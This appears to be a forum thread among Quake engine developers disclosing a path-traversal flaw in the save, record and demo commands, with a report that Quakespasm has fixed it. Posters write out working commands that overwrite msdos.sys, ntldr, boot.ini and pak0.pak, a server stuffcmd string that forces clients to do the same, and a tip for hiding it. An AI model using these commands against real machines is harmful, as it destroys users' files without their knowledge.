"save pak0.pak" vulnerability

[Spirit]

[Spirit]

It seems like an original bug, I tried it with the shareware. How on earth did this survive 18 years?

QUAKE.EXE even lets me write relative paths like "save ../config.sys", that sounds familiar though and I know some engines have at least that fixed.

I am sure other filesystem writing commands are affected too.

[Spike]

its not just saved games. try it with demos too. and frik_file etc

also, try:
game . ; gamedir . ; save opengl32.dll

[leileilol]

save ..\..\..\..\..\..\msdos.sys
save ..\..\..\..\..\..\ntldr
save ..\..\..\..\..\..\boot.ini
echo "HA I FUCED UR SYSTEM BICH!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"


Yeah this hole is fucking dangerous

Fortunately Windows 7 has VirtualStore these days...

[Spike]

add a clear command followed by a map change or something and they won't even realise you did it.

[szo]

[szo]

Fixed in the quakespasm svn repository as of rev. 902:
http://sourceforge.net/p/quakespasm/code/902/

[mh]

stuffcmd save pak0.pak

Just saying.

Bye again!

[szo]

[jitspoe]

[Spike]

stuffcmd(self, "disconnect;maxplayers 1;deathmatch 0;coop 0;map start;save pak0.pak;quit\n");
yes, you can save in a multiplayer game.

[Spirit]

Or just send "record pak0.pak".

I hope it is clear that this affects all commands/cvars where filenames are supplied by the user!

[qbism]

Could happen in SP with an evile progs.dat.

[jitspoe]

[r00k]